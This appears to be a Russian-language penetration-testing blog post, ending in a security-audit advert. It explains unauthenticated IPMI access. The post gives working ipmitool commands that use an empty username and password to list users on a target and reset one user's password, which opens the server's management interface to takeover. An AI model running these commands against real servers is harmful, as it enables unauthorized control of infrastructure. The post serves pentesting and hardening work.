IPMI старых версий подвержен множеству уязвимостей. Поэтому ответственным за серверную системы рекомендуется постоянно обновлять IPMI на серверах, а так же вынести его в изолированный сегмент. Одну из уязвимостей я описывал несколько лет назад в статье: Получение доступа к iLO через уязвимость IPMI Cipher 0. Сегодня мы поговорим о более простой уязвимости, которая часто появляется во время проведения теста на проникновение: доступу к IPMI без аутентификации.
Сначала установим все, что нам потребуется:
apt-get install ipmitool
Далее,найдя потенциально уязвимую систему, попробует получить список пользователей из IPMI:
ipmitool -I lanplus -H XXX.XXX.XXX.XXX -U '' -P '' user list
где:
-I – выбор протокола. lanplus говорит, что мы используем протокол IPMI v2.0 RMCP+ LAN Interface;
-H – IP-адрес атакуемого хоста;
-U – имя пользователя (кавычки указывают, что без имени пользователя);
-P – пароль (кавычки указывают, что без пароля);
user list – получить список пользователей.
Если уязвимость присутствует, то мы увидим список пользователей.
Теперь можно сменить пароль какому-либо пользователю:
ipmitool -I lanplus -H XXX.XXX.XXX.XXX -U '' -P '' user set password X passpass
user set password X passpass – установить пользователю номер X (номер пользователя берем из списка, полученного ранее) пароль passpass.
Далее можно подключаться к IPMI через SSH или Web-интерфейс.
Заказать Аудит Безопасности или Пентест Вашей IT-инфраструктурыБыть уверенным в своей IT-инфраструктуре – это быть уверенным в завтрашнем дне. Для того, чтобы сделать заказ:
|